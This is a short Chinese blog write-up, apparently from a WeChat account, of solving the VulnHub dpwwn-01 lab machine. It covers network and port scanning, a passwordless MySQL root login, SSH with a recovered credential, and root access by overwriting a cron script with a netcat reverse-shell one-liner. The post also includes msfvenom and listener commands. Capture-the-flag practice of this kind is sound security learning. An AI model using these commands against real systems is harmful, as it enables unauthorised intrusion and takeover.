本周末实践的是vulnhub的dpwwn-01镜像,这个镜像比较简单,
下载地址,https://download.vulnhub.com/dpwwn/dpwwn-01.zip,
解压后一看就是vmware的虚机,当然就用workstation打开,
启动靶机,从console上没有看到ip地址,还是得自己去扫,
启动kali攻击机,先做地址扫描,
sudo netdiscover -r 192.168.137.0/24,
拿到靶机地址,192.168.137.26,接着做端口扫描,
sudo nmap -sS -sV -T5 -A -p- 192.168.137.26,
看到有mysql服务,尝试无密码连接一下,竟然进去了,
mysql -h 192.168.137.26 -u root -p,
然后经过一顿查询操作找到了一对儿用户名密码,
mistic/testP@$$swordmistic,
用这对儿用户名密码尝试ssh登录一下,竟然也进去了,id一下发现不是root,接下来需要想办法提权,
查看一下计划任务,cat /etc/crontab,发现/home/mistic/logrot.sh三分钟执行一次,而且这个脚本文件当前账户可写,
在kali攻击机上制作反弹shell脚本内容,
msfvenom -p cmd/unix/reverse_netcat LHOST=192.168.137.204 LPORT=4444 R,
并在kali攻击机上开启nc监听,nc -lnvp 4444,
在靶机上执行echo -e '#!/bin/bashnmkfifo /tmp/slxjbbf; nc 192.168.137.204 4444 0</tmp/slxjbbf | /bin/sh >/tmp/slxjbbf 2>&1; rm /tmp/slxjbbf' > /home/mistic/logrot.sh,把反弹shell脚本内容写入定时任务脚本文件,
等待一会儿,就看到反弹shell过来了,id看一下,确认是root,完成。
本文始发于微信公众号(云计算和网络安全技术实践):vulnhub之dpwwn-01的实践
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论